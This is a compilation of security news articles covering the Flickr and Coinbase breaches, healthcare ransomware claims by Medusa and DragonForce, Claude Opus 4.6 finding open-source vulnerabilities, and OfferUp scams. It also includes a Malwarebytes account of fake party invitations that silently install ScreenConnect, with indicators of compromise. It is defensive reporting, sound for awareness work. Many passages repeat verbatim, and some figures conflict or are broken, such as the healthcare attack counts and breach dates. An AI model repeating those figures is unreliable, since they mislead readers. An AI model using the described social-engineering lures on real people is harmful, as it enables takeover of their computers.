Flickr did not disclose which 3rd-party provider was involved or how many users were potentially affected by this incident. A Flickr spokesperson was not immediately available for comment when contacted by BleepingComputer earlier today for more details.
The company said that it shut down access to the affected system within hours after being informed of the security flaw on February 5. While the vulnerability "may have" provided access to some member information, Flickr said that passwords and payment card numbers were not compromised in the incident.
"On February 5, 2026, we were alerted to a vulnerability in a system operated by one of our email service providers," the company said in emails to affected users. "This flaw may have allowed unauthorized access to some Flickr member information. We shut down access to the affected system within hours of learning about it."
The exposed information includes member names, email addresses, Flickr usernames, account types, IP addresses, general location data, and their activity on the platform.
The company has also encouraged affected users to review their account settings for any unexpected changes and to remain vigilant against phishing emails that may use their Flickr account information, noting that it will never request passwords over email.
Users are also recommended to update their passwords as soon as possible if they use their Flickr credentials on other services.
"We sincerely apologize for this incident and for the concern it may cause," Flickr added in the emailed notifications.
"We take the privacy and security of your data extremely seriously, and we are taking immediate action to prevent any similar issues by conducting a thorough investigation, strengthening our system architecture, & further enhancing our monitoring of 3rd-party service providers."
Founded in 2004, Flickr is one of the world's largest photography communities and sharing sites, hosting over 28 billion photos and videos. The company says it has 35 million monthly users and 800 million monthly page views.
Flickr did not disclose which 3rd-party provider was involved or how many users were potentially affected by this incident. A Flickr spokesperson was not immediately available for comment when contacted by BleepingComputer earlier today for more details.
The company said that it shut down access to the affected system within hours after being informed of the security flaw on February 5. While the vulnerability "may have" provided access to some member information, Flickr said that passwords and payment card numbers were not compromised in the incident.
"On February 5, 2026, we were alerted to a vulnerability in a system operated by one of our email service providers," the company said in emails to affected users. "This flaw may have allowed unauthorized access to some Flickr member information. We shut down access to the affected system within hours of learning about it."
The exposed information includes member names, email addresses, Flickr usernames, account types, IP addresses, general location data, and their activity on the platform.
The company has also encouraged affected users to review their account settings for any unexpected changes and to remain vigilant against phishing emails that may use their Flickr account information, noting that it will never request passwords over email.
Users are also recommended to update their passwords as soon as possible if they use their Flickr credentials on other services.
"We sincerely apologize for this incident and for the concern it may cause," Flickr added in the emailed notifications.
"We take the privacy and security of your data extremely seriously, and we are taking immediate action to prevent any similar issues by conducting a thorough investigation, strengthening our system architecture, & further enhancing our monitoring of 3rd-party service providers."
Birmingham Mental Health Authority warns 30,000+ People of Data Breach that leaked SSNs and Medical info
By Paul Bischoff for Comparitech
alabamafamilycentral.org
The Jefferson Blount St. Claire Mental Health Authority in Birmingham, Alabama has notified 30,434 people of a November 2025 data breach, according to a new breach disclosure by the US Department of Health and Human Services.
The breach compromised the following personal info:
The data was collected by the JBS Mental Health Authority between 2011 and 2025.
A ransomware group called Medusa took credit for the breach on December 23, 2025 and demanded a $200,000 ransom to destroy 168.6 GB of stolen data. To prove its claim, Medusa posted sample images of what it says are documents stolen from JBS' servers.
The breach compromised the following personal info:
- Names
- Social Security numbers
- Health insurance info
- Dates of birth
- Medical info including:
- Billing and claims info
- Diagnoses
- Physician info
- Medical record numbers
- Medicare/Medicaid info
- Prescriptions and medications
- Diagnostic and treatment info
The data was collected by the JBS Mental Health Authority between 2011 and 2025.
A ransomware group called Medusa took credit for the breach on December 23, 2025 and demanded a $200,000 ransom to destroy 168.6 GB of stolen data. To prove its claim, Medusa posted sample images of what it says are documents stolen from JBS' servers.
Medusa lists JBS Mental Health Authority on its data leak site.
JBS has not acknowledged Medusa's claim. Comparitech cannot verify the authenticity of the posted data. We do not know if JBS paid a ransom or how attackers breached its network. JBS declined to comment on the record when contacted by Comparitech.
"On or around November 25, 2025, JBS learned that it was the victim of a ransomware attack," says JBS' notice(PDF) to victims. "Through the investigation, it was determined that unauthorized access to the network occurred on November 25, 2025. During that time certain files may have been subject to unauthorized access and/or acquisition. The files involved could relate to certain patients or employees between the years of 2011 and 2025."
The notice does not mention any offer of free credit monitoring or identity theft protection for victims.
Medusa first appeared in September 2019 and debuted its leak site in February 2023, where it publishes stolen data of organizations that don't pay ransoms. Medusa both locks down computer systems and steals data, forcing infected organizations to pay a ransom to restore systems and to not publish stolen data. The gang operates a ransomware-as-a-service scheme in which customers pay to use Medusa's malware and infrastructure to launch attacks and collect ransoms.
In 2025, Medusa claimed responsibility for 35 confirmed ransomware attacks, plus 153 attack claims that haven't been publicly acknowledged by the targeted organizations. The confirmed attacks compromised the personal data of 1.76 million people.
Over half of Medusa's confirmed attacks struck healthcare providers like JBS, and those attacks account for the vast majority-- 1.65 million-- of the group's breach victims. Medusa demands providers pay $454,000 in ransom on average.
Pulse Urgent Care Center in California also recently started warning patients about a Medusa-claimed breach that occurred in March 2025. Following the breach, Medusa demanded $120,000 in ransom for 60.7 GB of data.
Ransomware attacks on US healthcare
Comparitech researchers logged 113 confirmed ransomware attacks in 2025 on US hospitals, clinics, and other healthcare providers. The resulting data breaches compromised the personal data of more than 8.9 million people.
Some of those attacks include:
- Neurological Associates of Washington notified 13,500 people of a December 2025 data breach claimed by DragonForce
- MACT Health Board reported a November 2025 data breach for which Rhysida demanded $662,000
- Alpine Ear, Nose & Throat notified 65,648 people of a November 2025 data breach claimed by BianLian
Ransomware attacks on US hospitals, clinics, and other care providers can steal data and lock down infected computer systems. They can cripple critical systems and endanger the health, privacy, and security of patients. Infected hospitals and clinics must pay a ransom or face extended downtime, data loss, and putting patients and staff at increased risk. Hospitals and clinics might resort to pen and paper, cancel appointments, and divert patients elsewhere until systems are restored.
About the Jefferson Blount St. Claire Mental Health Authority
The JBS Mental Health Authority in Birmingham, Alabama runs four mental health facilities in 3 counties: Jefferson, Blount, and St. Clair.
Claude Opus 4.6 Finds 500+ High-Severity Flaws Across Major Open-Source Libraries
By Ravie Lakshmanan for The Hacker News
The Hacker News
Artificial intelligence (AI) company Anthropic revealed that its latest large language model (LLM), Claude Opus 4.6, has found more than 500 previously unknown high-severity security flaws in open-source libraries, including Ghostscript, OpenSC, and CGIF.
Claude Opus 4.6, which was launched Thursday, comes with improved coding skills, including code review and debugging capabilities, along with enhancements to tasks like financial analyses, research, and document creation.
Stating that the model is "notably better" at discovering high-severity vulnerabilities without requiring any task-specific tooling, custom scaffolding, or specialized prompting, Anthropic said it is putting it to use to find and help fix vulnerabilities in open-source software.
"Opus 4.6 reads and reasons about code the way a human researcher would-- looking at past fixes to find similar bugs that weren't addressed, spotting patterns that tend to cause problems, or understanding a piece of logic well enough to know exactly what input would break it," it added.
Prior to its debut, Anthropic's Frontier Red Team put the model to test inside a virtualized environment and gave it the necessary tools, such as debuggers and fuzzers, to find flaws in open-source projects. The idea, it said, was to assess the model's out-of-the-box capabilities without providing any instructions on how to use these tools or providing information that could help it better flag the vulnerabilities.
The company also said it validated every discovered flaw to make sure that it was not made up-- i.e., hallucinated-- and that the LLM was used as a tool to prioritize the most severe memory corruption vulnerabilities that were identified.
Some of the security defects that were flagged by Claude Opus 4.6 are listed below. They have since been patched by the respective maintainers.
"This vulnerability is particularly interesting because triggering it requires a conceptual understanding of the LZW algorithm and how it relates to the GIF file format," Anthropic said of the CGIF bug. "Traditional fuzzers-- and even coverage-guided fuzzers-- struggle to trigger vulnerabilities of this nature because they require making a particular choice of branches."
"In fact, even if CGIF had 100% line-- and branch-coverage, this vulnerability could still remain undetected: it requires a very specific sequence of operations."
The company has pitched AI models like Claude as a critical tool for defenders to "level the playing field." But it also emphasized that it will adjust and update its safeguards as potential threats are discovered and put in place additional guardrails to prevent misuse.
The disclosure comes weeks after Anthropic said its current Claude models can succeed at multi-stage attacks on networks with dozens of hosts using only standard, open-source tools by finding and exploiting known security flaws.
"This illustrates how barriers to the use of AI in relatively autonomous cyber workflows are rapidly coming down, and highlights the importance of security fundamentals like promptly patching known vulnerabilities," it said.
Claude Opus 4.6, which was launched Thursday, comes with improved coding skills, including code review and debugging capabilities, along with enhancements to tasks like financial analyses, research, and document creation.
Stating that the model is "notably better" at discovering high-severity vulnerabilities without requiring any task-specific tooling, custom scaffolding, or specialized prompting, Anthropic said it is putting it to use to find and help fix vulnerabilities in open-source software.
"Opus 4.6 reads and reasons about code the way a human researcher would-- looking at past fixes to find similar bugs that weren't addressed, spotting patterns that tend to cause problems, or understanding a piece of logic well enough to know exactly what input would break it," it added.
Prior to its debut, Anthropic's Frontier Red Team put the model to test inside a virtualized environment and gave it the necessary tools, such as debuggers and fuzzers, to find flaws in open-source projects. The idea, it said, was to assess the model's out-of-the-box capabilities without providing any instructions on how to use these tools or providing information that could help it better flag the vulnerabilities.
The company also said it validated every discovered flaw to make sure that it was not made up-- i.e., hallucinated-- and that the LLM was used as a tool to prioritize the most severe memory corruption vulnerabilities that were identified.
Some of the security defects that were flagged by Claude Opus 4.6 are listed below. They have since been patched by the respective maintainers.
- Parsing the Git commit history to identify a vulnerability in Ghostscript that could result in a crash by taking advantage of a missing bounds check
- Searching for function calls like strrchr() and strcat() to identify a buffer overflow vulnerability in OpenSC
- A heap buffer overflow vulnerability in CGIF-- Fixed in version 0.5.1
"This vulnerability is particularly interesting because triggering it requires a conceptual understanding of the LZW algorithm and how it relates to the GIF file format," Anthropic said of the CGIF bug. "Traditional fuzzers-- and even coverage-guided fuzzers-- struggle to trigger vulnerabilities of this nature because they require making a particular choice of branches."
"In fact, even if CGIF had 100% line-- and branch-coverage, this vulnerability could still remain undetected: it requires a very specific sequence of operations."
The company has pitched AI models like Claude as a critical tool for defenders to "level the playing field." But it also emphasized that it will adjust and update its safeguards as potential threats are discovered and put in place additional guardrails to prevent misuse.
The disclosure comes weeks after Anthropic said its current Claude models can succeed at multi-stage attacks on networks with dozens of hosts using only standard, open-source tools by finding and exploiting known security flaws.
"This illustrates how barriers to the use of AI in relatively autonomous cyber workflows are rapidly coming down, and highlights the importance of security fundamentals like promptly patching known vulnerabilities," it said.
Coinbase Confirms Insider Breach linked to Leaked Support Tool Screenshots
By Lawrence Abrams for bleepingcomputer
bleepingcomputer
Coinbase has confirmed an insider breach after a contractor improperly accessed the data of approximately thirty customers, which BleepingComputer has learned is a new incident that occurred in December.
"Last year our security team detected that a single Coinbase contractor improperly accessed customer information, impacting a very small number of users-- approximately 30"-- a Coinbase spokesperson told BleepingComputer.
"The individual no longer performs services for Coinbase. Impacted users we notified last year and were provided with identity theft protection services and other guidance. We have also disclosed this incident to the relevant regulators, as is standard practice."
BleepingComputer has learned that this is a newly revealed insider breach and is not related to the previously disclosed TaskUs insider breach in January 2025.
This statement comes after threat actors known as "Scattered Lapsus Hunters" (SLH) briefly posted screenshots of an internal Coinbase support interface on Telegram and then deleted the posts soon after.
The screenshots showed a support panel that gave access to customer information, including email addresses, names, date of birth, phone numbers, KYC information, cryptocurrency wallet balances, and transactions.
It is not uncommon for screenshots and stolen data to be passed around among different threat actors before being leaked or disclosed, so it is unclear whether this group was behind the insider breach or whether other threat actors carried it out.
However, the same threat actors previously claimed to have bribed an insider at CrowdStrike to share screenshots of internal applications.
BPOs under attack
Over the past few years, Business Process Outsourcing (BPO) companies have become increasingly targeted by threat actors seeking access to customer data, internal tools, or corporate networks.
A Business Process Outsourcing (BPO) company is a 3rd-party firm that performs operational tasks for another organization. These tasks commonly include customer support, identity verification, IT help desk services, and account management.
Because BPO employees often have access to sensitive internal systems and customer information, they have become a high-value target for attackers.
In the past year, threat actors have exploited BPOs through bribing insiders with legitimate access, social engineering support staff to grant unauthorized access, and compromising BPO employee accounts to reach internal systems.
As we have seen with Coinbase this year, one way BPOs are targeted is by bribing their employees to steal or share customer information.
Coinbase disclosed a similar data breach last year, later linked to external customer support representatives employed by TaskUs, an outsourcing firm that provides services to the crypto exchange.
Another common tactic is social engineering attacks against outsourced IT and support desks, where threat actors impersonate employees and call BPO help lines to obtain access to internal corporate systems.
In one of the most prominent cases, attackers posed as an employee and convinced a Cognizant help desk support agent to grant them access to a Clorox employee account, allowing them to breach the company's network. The incident later became the focus of a $380 million lawsuit by Clorox against Cognizant.
Google also reported that threat actors targeted US insurance firms in social engineering attacks on outsourced help desks to gain access to internal systems.
Retailers also confirmed that social engineering attacks against support personnel enabled ransomware and data theft attacks.
Marks & Spencer confirmed attackers used social engineering to breach its networks, while Co-op disclosed data theft following a ransomware attack that similarly abused support staff access.
In response to the attacks on M&S and Co-op retail companies, the UK government issued guidance on social engineering attacks against help desks and BPOs.
In some cases, hackers target the BPO employee accounts themselves to gain access to the customer data they manage.
In October, Discord disclosed a data breach that allegedly exposed data from 5.5 million unique users after its Zendesk support system instance was compromised.
While the company did not confirm how its instance was breached, the threat actors told BleepingComputer that they used a compromised account belonging to a support agent employed by an outsourced business process outsourcing (BPO) provider. Using this account, they downloaded Discord's customer data.
This repeated abuse of outsourced support providers shows how threat actors are increasingly bypassing vulnerability exploits and instead targeting 3rd-party companies with access to corporate networks and data.
"Last year our security team detected that a single Coinbase contractor improperly accessed customer information, impacting a very small number of users-- approximately 30"-- a Coinbase spokesperson told BleepingComputer.
"The individual no longer performs services for Coinbase. Impacted users we notified last year and were provided with identity theft protection services and other guidance. We have also disclosed this incident to the relevant regulators, as is standard practice."
BleepingComputer has learned that this is a newly revealed insider breach and is not related to the previously disclosed TaskUs insider breach in January 2025.
This statement comes after threat actors known as "Scattered Lapsus Hunters" (SLH) briefly posted screenshots of an internal Coinbase support interface on Telegram and then deleted the posts soon after.
The screenshots showed a support panel that gave access to customer information, including email addresses, names, date of birth, phone numbers, KYC information, cryptocurrency wallet balances, and transactions.
It is not uncommon for screenshots and stolen data to be passed around among different threat actors before being leaked or disclosed, so it is unclear whether this group was behind the insider breach or whether other threat actors carried it out.
However, the same threat actors previously claimed to have bribed an insider at CrowdStrike to share screenshots of internal applications.
BPOs under attack
Over the past few years, Business Process Outsourcing (BPO) companies have become increasingly targeted by threat actors seeking access to customer data, internal tools, or corporate networks.
A Business Process Outsourcing (BPO) company is a 3rd-party firm that performs operational tasks for another organization. These tasks commonly include customer support, identity verification, IT help desk services, and account management.
Because BPO employees often have access to sensitive internal systems and customer information, they have become a high-value target for attackers.
In the past year, threat actors have exploited BPOs through bribing insiders with legitimate access, social engineering support staff to grant unauthorized access, and compromising BPO employee accounts to reach internal systems.
As we have seen with Coinbase this year, one way BPOs are targeted is by bribing their employees to steal or share customer information.
Coinbase disclosed a similar data breach last year, later linked to external customer support representatives employed by TaskUs, an outsourcing firm that provides services to the crypto exchange.
Another common tactic is social engineering attacks against outsourced IT and support desks, where threat actors impersonate employees and call BPO help lines to obtain access to internal corporate systems.
In one of the most prominent cases, attackers posed as an employee and convinced a Cognizant help desk support agent to grant them access to a Clorox employee account, allowing them to breach the company's network. The incident later became the focus of a $380 million lawsuit by Clorox against Cognizant.
Google also reported that threat actors targeted US insurance firms in social engineering attacks on outsourced help desks to gain access to internal systems.
Retailers also confirmed that social engineering attacks against support personnel enabled ransomware and data theft attacks.
Marks & Spencer confirmed attackers used social engineering to breach its networks, while Co-op disclosed data theft following a ransomware attack that similarly abused support staff access.
In response to the attacks on M&S and Co-op retail companies, the UK government issued guidance on social engineering attacks against help desks and BPOs.
In some cases, hackers target the BPO employee accounts themselves to gain access to the customer data they manage.
In October, Discord disclosed a data breach that allegedly exposed data from 5.5 million unique users after its Zendesk support system instance was compromised.
While the company did not confirm how its instance was breached, the threat actors told BleepingComputer that they used a compromised account belonging to a support agent employed by an outsourced business process outsourcing (BPO) provider. Using this account, they downloaded Discord's customer data.
This repeated abuse of outsourced support providers shows how threat actors are increasingly bypassing vulnerability exploits and instead targeting 3rd-party companies with access to corporate networks and data.
How Fake Party Invitations are being used to install Remote Access Tools
By Stefan Dasic for Malwarebytes
Malwarebytes
"You're invited!"
It sounds friendly, familiar and quite harmless. But in a scam we recently spotted, that simple phrase is being used to trick victims into installing a full remote access tool on their Windows computers-- giving attackers complete control of the system.
What appears to be a casual party or event invitation leads to the silent installation of ScreenConnect, a legitimate remote support tool quietly installed in the background and abused by attackers.
Here's how the scam works, why it's effective, and how to protect yourself.
The email: A party invitation
Victims receive an email framed as a personal invitation-- often written to look like it came from a friend or acquaintance. The message is deliberately informal and social, lowering suspicion and encouraging quick action.
In the screenshot below, the email arrived from a friend whose email account had been hacked, but it could just as easily come from a sender you don't know.
So far, we've only seen this campaign targeting people in the UK, but there's nothing stopping it from expanding elsewhere.
Clicking the link in the email leads to a polished invitation page hosted on an attacker-controlled domain.
It sounds friendly, familiar and quite harmless. But in a scam we recently spotted, that simple phrase is being used to trick victims into installing a full remote access tool on their Windows computers-- giving attackers complete control of the system.
What appears to be a casual party or event invitation leads to the silent installation of ScreenConnect, a legitimate remote support tool quietly installed in the background and abused by attackers.
Here's how the scam works, why it's effective, and how to protect yourself.
The email: A party invitation
Victims receive an email framed as a personal invitation-- often written to look like it came from a friend or acquaintance. The message is deliberately informal and social, lowering suspicion and encouraging quick action.
In the screenshot below, the email arrived from a friend whose email account had been hacked, but it could just as easily come from a sender you don't know.
So far, we've only seen this campaign targeting people in the UK, but there's nothing stopping it from expanding elsewhere.
Clicking the link in the email leads to a polished invitation page hosted on an attacker-controlled domain.
Malwarebytes
The invite: The landing page that leads to an installer
The landing page leans heavily into the party theme, but instead of showing event details, the page nudges the user toward opening a file. None of them look dangerous on their own, but together they keep the user focused on the "invitation" file:
- A bold "You're Invited!" headline
- The suggestion that a friend had sent the invitation
- A message saying the invitation is best viewed on a Windows laptop or desktop
- A countdown suggesting your invitation is already "downloading"
- A message implying urgency and social proof-- "I opened mine and it was so easy!"
Within seconds, the browser is redirected to download RSVPPartyInvitationCard.msi
The page even triggers the download automatically to keep the victim moving forward without stopping to think.
This MSI file isn't an invitation. It's an installer.
The guest: What the MSI actually does
When the user opens the MSI file, it launches msiexec.exe and silently installs ScreenConnect Client, a legitimate remote access tool often used by IT support teams.
There's no invitation, RSVP form, or calendar entry.
What happens instead:
- ScreenConnect binaries are installed under C:\Program Files (x86)\ScreenConnect Client\
- A persistent Windows service is created (for example, ScreenConnect Client 18d1648b87bb3023)
- ScreenConnect installs multiple .NET-based components
- There is no clear user-facing indication that a remote access tool is being installed
From the victim's perspective, very little seems to happen. But at this point, the attacker can now remotely access their computer.
The after-party: Remote access is established
Once installed, the ScreenConnect client initiates encrypted outbound connections to ScreenConnect's relay servers, including a uniquely assigned instance domain.
That connection gives the attacker the same level of access as a remote IT technician, including the ability to:
- See the victim's screen in real time
- Control the mouse and keyboard
- Upload or download files
- Keep access even after the computer is restarted
Because ScreenConnect is legitimate software commonly used for remote support, its presence isn't always obvious. On a personal computer, the first signs are often behavioral, such as unexplained cursor movement, windows opening on their own, or a ScreenConnect process the user doesn't remember installing.
Why this scam works
This campaign is effective because it targets normal, predictable human behavior. From a behavioral security standpoint, it exploits our natural curiosity and appears to be a low risk.
Most people don't think of invitations as dangerous. Opening one feels passive, like glancing at a flyer or checking a message, not installing software.
Even security-aware users are trained to watch out for warnings and pressure. A friendly "you're invited" message doesn't trigger those alarms.
By the time something feels off, the software is already installed.
Signs your computer may be affected - Watch for:
- A download or executed file named RSVPPartyInvitationCard.msi
- An unexpected installation of ScreenConnect Client
- A Windows service named ScreenConnect Client with random characters
- Your computer makes outbound HTTPS connections to ScreenConnect relay domains
- Your system resolves the invitation-hosting domain used in this campaign, xnyr[.]digital
How to stay safe
This campaign is a reminder that modern attacks often don't break in-- they're invited in. Remote access tools give attackers deep control over a system. Acting quickly can limit the damage.
For individuals - If you receive an email like this:
- Be suspicious of invitations that ask you to download or open software
- Never run MSI files from unsolicited emails
- Verify invitations through another channel before opening anything
If you already clicked or ran the file:
- Disconnect from the internet immediately
- Check for ScreenConnect and uninstall it if present
- Run a full security scan
- Change important passwords from a clean, unaffected device
For organizations (especially in the UK)
- Alert on unauthorized ScreenConnect installations
- Restrict MSI execution where feasible
- Treat "remote support tools" as high-risk software
- Educate users: invitations don't come as installers
This scam works by installing a legitimate remote access tool without clear user intent. That's exactly the gap Malwarebytes is designed to catch.
Malwarebytes now detects newly installed remote access tools and alerts you when one appears on your system. You're then given a choice: confirm that the tool is expected and trusted, or remove it if it isn't.
OfferUp Scammers are Out in Force: What You Should Know
By Phil Muncaster for We Live Security
The mobile marketplace app has a growing number of users, but not all of them are genuine. Watch out for these common scams.
The mobile marketplace app has a growing number of users, but not all of them are genuine. Watch out for these common scams.
We Live Security
OfferUp has been in business for nearly 15 years. Although little known outside the US, the marketplace app competes for consumer hearts and minds with industry giants Craigslist, Facebook Marketplace and eBay. And like them, it has a problem with fraud. If you're looking to buy or sell on the platform and want to stay clear of the scammers, read on.
Top 10 OfferUp scams
OfferUp claims to process over 30 million transactions each year. That's inevitably going to attract some users with nefarious motives. Here are the most common scams you may encounter on the platform:
Counterfeit items
Beware of high-value items that turn out to be rip offs. The seller will typically try to persuade you to pay via a 3rd-party service-- e.g., Zelle, Venmo-- rather than through the app, as doing so means the item won't be covered by OfferUp's Purchase Protection.
Payment scam
As above, scammers-- whether buyer or sellers-- will often try to trick you into transacting via 3rd-party cash app services. They may:
Top 10 OfferUp scams
OfferUp claims to process over 30 million transactions each year. That's inevitably going to attract some users with nefarious motives. Here are the most common scams you may encounter on the platform:
Counterfeit items
Beware of high-value items that turn out to be rip offs. The seller will typically try to persuade you to pay via a 3rd-party service-- e.g., Zelle, Venmo-- rather than through the app, as doing so means the item won't be covered by OfferUp's Purchase Protection.
Payment scam
As above, scammers-- whether buyer or sellers-- will often try to trick you into transacting via 3rd-party cash app services. They may:
- Promise to pay above the asking price for a product you're selling, in order to persuade you to agree to them using a cash app. They then overpay using a stolen account or fake check, and ask for a refund. If you pay it, you'll eventually be down the refund, plus your item, and may be asked to repay the original fraudulent sum
- Ask to pay via gift cards, which turn out to be fake or with zero value
- Claim to be out-of-town sellers, requesting cash-app payment for items they never end up shipping
Source: Reddit
Account takeover
A buyer asks you for a verification code in order to 'verify' your listing, for instance through Google Voice. In fact, they're usually trying to log into your account and need the 2-factor authentication code sent by OfferUp. If you hand it over, they get control of your account, enabling them to access your personal information and potentially use your account to scam others.
Empty box
Some sellers add disclaimers in a lengthy item description saying they are only offering the box or a digital photo of the item. So when it arrives, all you'll receive is an empty box.
Phishing links
Scam buyers and sellers might send you a message saying something like "click here to get paid" or "click to verify your info". Doing so will take you to a phishing site where you'll be asked to fill in your logins, payment details and/or other sensitive personal information.
A buyer asks you for a verification code in order to 'verify' your listing, for instance through Google Voice. In fact, they're usually trying to log into your account and need the 2-factor authentication code sent by OfferUp. If you hand it over, they get control of your account, enabling them to access your personal information and potentially use your account to scam others.
Empty box
Some sellers add disclaimers in a lengthy item description saying they are only offering the box or a digital photo of the item. So when it arrives, all you'll receive is an empty box.
Phishing links
Scam buyers and sellers might send you a message saying something like "click here to get paid" or "click to verify your info". Doing so will take you to a phishing site where you'll be asked to fill in your logins, payment details and/or other sensitive personal information.
Source: Reddit
Email phishing
Some buyers or sellers might ask for your email address or phone number during the transaction process. They'll use it to spam you with malicious links designed to steal your information or install malware on your device.
Deposit scam
A seller posts a high-value item, offering to deliver it to you as long as you put a deposit down to secure it. It turns out the item doesn't exist, and you've lost the deposit.
Source: Reddit
Bouncing checks
A scammer pays for an item you're selling via check, which bounces several days later, leaving you without the item and no payment.
Investment opportunity
A seller posts a listing about an "investment opportunity" or similar, but requires you to send money first.
Fake jobs
Scammers may pose as employers that require upfront payment for 'background checks' or similar. Alternatively, they may request you fill in your personal and financial details as part of the 'application process,' which they can use for identity fraud.
What OfferUp protects
OfferUp offers 2-day Purchase Protection for buyers, meaning that you have 48 hours from delivery to file a claim for items:
You can also file for items not received and/or empty box scams.
However, OfferUp will not offer protection for anything purchased off-app, or that violates its rules-- e.g., gift cards, alcohol-- or that was paid for in cash, in person.
What to look out for
When you're browsing the app, the following should all be red flags:
Staying safe
To stay safe on the app, the advice is very simple: don't leave it and don't click on any dubious links. That means never leaving the app for messaging or payments, never handing over your personal details, and not responding to messages with links in them. If you arrange an in-person sale, make sure it's at a Community Meetup Spot. And if you want to be ultra careful, only buy from or sell to a user with a "TruYou" badge on their profile, indicating their identity has been verified.
I've been scammed, what next?
If the worst-case scenario comes to pass, report the scam to OfferUp immediately, in case you're covered by the firm's 2-day Purchase Protection. In Messages, tap the conversation with the scammer and the 3-dots in the corner, then Report. Submit a Purchase Protection claim in the OfferUp Help Center.
If you've paid outside of the app, contact your bank to file a chargeback-- if a card payment-- or file a report with the cash app you paid with. The latter is unlikely to get your money back, but may help get the scammer banned.
If you've shared personal information or a verification code with a scammer, change your app passwords, and do the same for any sites you reuse the same credential on. Monitor your bank accounts for unusual activity. And be wary of any follow-up phishing attempts that pop into your inbox/messages.
Finally, consider reporting the scam to the authorities, eg FTC, FBI or Report Fraud (UK). Before you delete messages or block the user, take screenshots of the original listing, the scammer's profile, your chat history and any payment receipts.
OfferUp is great way to pick up bargains in your area, or make a little extra money from items you no longer need. But remember, not everyone is acting in good faith.
A scammer pays for an item you're selling via check, which bounces several days later, leaving you without the item and no payment.
Investment opportunity
A seller posts a listing about an "investment opportunity" or similar, but requires you to send money first.
Fake jobs
Scammers may pose as employers that require upfront payment for 'background checks' or similar. Alternatively, they may request you fill in your personal and financial details as part of the 'application process,' which they can use for identity fraud.
What OfferUp protects
OfferUp offers 2-day Purchase Protection for buyers, meaning that you have 48 hours from delivery to file a claim for items:
- Significantly not as described
- Damaged in transit
- Counterfeit
You can also file for items not received and/or empty box scams.
However, OfferUp will not offer protection for anything purchased off-app, or that violates its rules-- e.g., gift cards, alcohol-- or that was paid for in cash, in person.
What to look out for
When you're browsing the app, the following should all be red flags:
- Deals that are too good to be true, usually from fraudulent sellers who want you to put a deposit down, or scam buyers wanting to persuade you into transacting off app.
- A buyer profile with no history. This isn't necessarily a scammer, but it pays to be extra cautious
- A suggested meetup point that's not a Community Meetup Spot, as this could indicate they want the transaction not to be observed
- A buyer/seller asks for a verification code, which they actually want to log into your account
- Buyers/sellers send you messages containing links to 'verify' or similar
- A seller tries to use urgency to rush you into making an unwise decision, like buying a counterfeit item or putting a deposit down for a non-existent item.
- Emotional manipulation, such as scammers saying they can't meet in person because they are in the military or out of town on family emergency
- Phrases like "box only," "digital photo," or "replica" hidden in a lengthy product description
- Requests to pay off app
- Stock photos of items rather than ones they've taken themselves, indicating they don't actually own the product
- Overpayment for an item
Staying safe
To stay safe on the app, the advice is very simple: don't leave it and don't click on any dubious links. That means never leaving the app for messaging or payments, never handing over your personal details, and not responding to messages with links in them. If you arrange an in-person sale, make sure it's at a Community Meetup Spot. And if you want to be ultra careful, only buy from or sell to a user with a "TruYou" badge on their profile, indicating their identity has been verified.
I've been scammed, what next?
If the worst-case scenario comes to pass, report the scam to OfferUp immediately, in case you're covered by the firm's 2-day Purchase Protection. In Messages, tap the conversation with the scammer and the 3-dots in the corner, then Report. Submit a Purchase Protection claim in the OfferUp Help Center.
If you've paid outside of the app, contact your bank to file a chargeback-- if a card payment-- or file a report with the cash app you paid with. The latter is unlikely to get your money back, but may help get the scammer banned.
If you've shared personal information or a verification code with a scammer, change your app passwords, and do the same for any sites you reuse the same credential on. Monitor your bank accounts for unusual activity. And be wary of any follow-up phishing attempts that pop into your inbox/messages.
Finally, consider reporting the scam to the authorities, eg FTC, FBI or Report Fraud (UK). Before you delete messages or block the user, take screenshots of the original listing, the scammer's profile, your chat history and any payment receipts.
OfferUp is great way to pick up bargains in your area, or make a little extra money from items you no longer need. But remember, not everyone is acting in good faith.
Everyone's Wrong about Al Plotting Against Us
- The Real Threat is Happening Now
Seattle-area Neurologist warns 13,500 People of Data Breach that Leaked SSNs, Medical Info
By Paul Bischoff for Comparitech
neuroassociates.us
Neurological Associates of Washington near Seattle this week confirmed it notified 13,500 state residents of a December 2025 data breach that compromised the following info:
Names
Social Security numbers
Diagnoses
Disability codes
Medical info
Dates of birth
Addresses
Other types of information
A cybercriminal group called DragonForce took credit for the attack on December 27, 2025, saying it stole 1.4 TB of data from the clinic. To prove its claim, DragonForce posted sample images of what it says are documents stolen from Neurological Associates of Washington.
Names
Social Security numbers
Diagnoses
Disability codes
Medical info
Dates of birth
Addresses
Other types of information
A cybercriminal group called DragonForce took credit for the attack on December 27, 2025, saying it stole 1.4 TB of data from the clinic. To prove its claim, DragonForce posted sample images of what it says are documents stolen from Neurological Associates of Washington.
DragonForce lists Neurological Associates of Washington on its data leak site.
Neurological Associates of Washington cited DragonForce as the attacker, but Comparitech cannot verify the authenticity of the allegedly stolen data. We do not know if Neurological Associates of Washington paid a ransom, how much DragonForce demanded, or how attackers breached the clinic's network. Comparitech contacted Neurological Associates of Washington for comment and will update this article if it replies.
"Our facilities server that stored medical records from 2019-2025 was attacked and encrypted. We discovered some of the data one of our computers was stolen," says the clinic's notice to victims.
Neurological Associates of Washington is offering eligible data breach victims 12 months of free credit monitoring.
Who is DragonForce?
DragonForce is a ransomware gang that first started claiming responsibility for attacks on its leak site in December 2023. It operates a ransomware-as-a-service business in which customers pay to use DragonForce's malware and infrastructure to launch attacks and collect ransoms. DragonForce often extorts victims both to unlock infected systems and to destroy stolen data.
DragonForce has claimed responsibility for 51 confirmed ransomware attacks since it began, plus 211 unconfirmed attack claims that haven't been publicly acknowledged by the targeted organizations. The confirmed attacks breached more than 7.6 people's personal records.
10 of DragonForce's confirmed victims were healthcare providers like Neurological Associates of Washington. Around the same time as that attack, DragonForce also hacked Centro Médico Palafox in Spain. And the group's largest such attack hit Asheville Eye Associates in December 2024, which later notified 204,984 people.
Ransomware attacks on US healthcare
Comparitech researchers logged 111 confirmed ransomware attacks on US hospitals, clincis, and other healthcare providers in 2025. Those attacks compromised the personal information of more than 8.9 million people.
Other such recently confirmed attacks include:
- Alpine Ear, Nose, & Throat (CO) notified 65,648 people of a December 2024 data breach claimed by the BianLian ransomware group
- Spindletop Center (TX) reported a September 2025 data breach for which Rhysida demanded $1.65 million
- MACT Health Board (CA) reported a November 2025 data breach for which Rhysida demanded $661,000.
- Center for Life Resources (TX) reported a November 2025 data breach claimed by Sinobi
